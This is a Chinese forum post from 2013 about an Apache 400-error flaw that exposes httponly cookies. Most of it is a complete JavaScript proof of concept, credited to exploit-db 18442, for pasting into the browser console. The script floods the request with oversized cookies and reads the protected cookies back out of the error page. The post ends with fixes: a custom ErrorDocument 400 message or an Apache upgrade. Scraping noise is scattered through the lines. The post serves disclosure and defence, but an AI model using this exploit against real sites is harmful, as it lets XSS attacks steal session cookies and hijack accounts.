很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。) h+ h; w1 V$ G
% E: _ C( J$ i: P% \
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:7 h+ {5 r3 h7 [; [+ I# Y
: u* H' B- v* w7 A9 c) D
. v5 Y% u4 ^9 y" x! Q# ^6 r// http://www.exploit-db.com/exploits/18442/: o4 ~+ [; z4 R- E+ b" P8 ^
function setCookies (good) {% ?; ~) b4 J: ~7 C' J0 F* G
// Construct string for cookie value) |! P& m6 \7 W0 Y3 w
var str = "";
* f% Q3 o" d3 w1 g' kfor (var i=0; i< 819; i++) {
4 g }1 b {, N* }; u- Kstr += "x";
9 Y/ m H) y3 c) B, p}4 h+ L, s* j: R; a) E+ d
// Set cookies
1 u4 C3 S1 }" r* o' R- {; |1 Ufor (i = 0; i < 10; i++) {
5 k5 \* W9 @0 L: t" t// Expire evil cookie
% @, `1 G# o, sif (good) {
" j2 H9 l! H/ E. T2 Y! d8 W1 Xvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";7 w0 ~6 T, |: F8 T, |& m8 h: |4 M
}3 v z( W, ?5 x3 c
// Set evil cookie* v/ L: j6 W7 T
else {. j9 y% ?5 z3 ~3 E. W
var cookie = "xss"+i+"="+str+";path=/";
; E0 Q8 i# h3 l9 j1 V! X2 ~" i7 U}- Q/ ]% i0 G* [: c& }- A( h
document.cookie = cookie;
7 b7 i, `- D$ c1 R}
& A2 o/ R$ {# ?: E" q: p) r& r0 _: x}
# z3 Z4 R4 c' k1 G1 ]8 Ffunction makeRequest() {4 S) y8 e' m/ z, ?9 s& H
setCookies();( I; n0 {1 p$ u
function parseCookies () {
: F* G2 F R1 L' A; y, Qvar cookie_dict = {};3 U |' K- c, |2 k& ~
// Only react on 400 status! G$ ^7 H: @, ?
if (xhr.readyState === 4 && xhr.status === 400) {- `) t* C; j& x- ^; Q/ X) _0 u
// Replace newlines and match <pre> content) \+ `! m% k7 r9 E: v- k
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/); f& q/ I0 l. r6 N% C
if (content.length) {
1 |: Y- q, H8 P( Z; t# Q// Remove Cookie: prefix
( T |! U' E( x: [content = content[1].replace("Cookie: ", "");
: O8 I" }$ p! d' \5 Q: D; G( Zvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);7 G b: ?( M6 R- L) n
// Add cookies to object6 J/ f* z2 K6 y; `7 J: }
for (var i=0; i<cookies.length; i++) {$ ?; |) t* O" x
var s_c = cookies.split('=',2);
) X9 c# t: B, Ccookie_dict[s_c[0]] = s_c[1];
- ^- `& w: y4 b" h4 i}) K0 b3 E, b" x
}
6 F, t* Z. B# v% I+ C* \// Unset malicious cookies
9 c7 |4 A; m* g' NsetCookies(true);
6 V2 P$ f4 Q; T5 e }1 talert(JSON.stringify(cookie_dict));
; [- e) s3 n6 T& Y# L}
( B& F/ t) X( F w/ v}
( r7 v( N! `5 e" `! P' G// Make XHR request
5 R* t6 ~; z/ ?2 p8 ovar xhr = new XMLHttpRequest();
' `2 N0 z) A- n% X1 k; @xhr.onreadystatechange = parseCookies;
3 `- m$ G) R/ H/ A b$ M6 d: ~8 vxhr.open("GET", "/", true);
; t# o- @9 w2 f6 Uxhr.send(null); D: d6 c& U+ f' S% x3 o1 b! P7 L0 a
}7 g5 l1 v* Q9 K( u( |: S
makeRequest();. D% p$ }% y9 v7 @6 |1 x3 g- t
) U6 @4 I f& P" W7 a你就能看见华丽丽的400错误包含着cookie信息。: T# o/ ]1 H `
& B6 K( ?, u+ v3 |( @* P; |4 m下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#0 i a7 J5 z6 `1 e6 ?
2 j3 L5 m8 J3 J# C5 J修复方案:( c5 D7 s6 C, r# \3 i
; y5 q0 ?% X$ P' y# w' AApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下# p: B4 [1 W- i4 i1 n
( y7 G/ K+ Y" n1 `8 [! x
In the event of a problem or error, Apachecan be configured to do one of four things,
' P' u3 @2 \2 ?5 z" }- u7 `1 W8 M: A M) m7 Q# _* k
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
) B: W0 h# Y9 {3 ?' h8 K2. output acustomized message输出一段信息
; ~1 r7 Y) h. `3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
' |- f$ o8 \/ ?% q4. redirect to an external URL to handle theproblem/error转向一个外部URL- u! u, k" ~. ~
* Z( r3 y% Z" z( K4 V经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容8 s0 b" E- N5 O5 Z, Y
! b6 Y2 z, x [: E0 J
Apache配置:# z5 B* N% m8 ]' r7 s
! |# j4 C. o7 G1 vErrorDocument400 " security test"; I; I! ]2 G) i9 C1 a, e
h$ P$ \3 h& u, {) D- e# ^ g8 W
当然,升级apache到最新也可:)。
& Y' ?! @ P! l: P6 g0 h8 d' M2 Q/ B9 C3 Q9 {% P, a
参考:http://httpd.apache.org/security/vulnerabilities_22.html
+ l+ f, J* Q7 T% ?7 h: Y' @( g9 j' L4 k$ b
|
发表于 2013-4-19 19:15:43
收藏
分享
支持
反对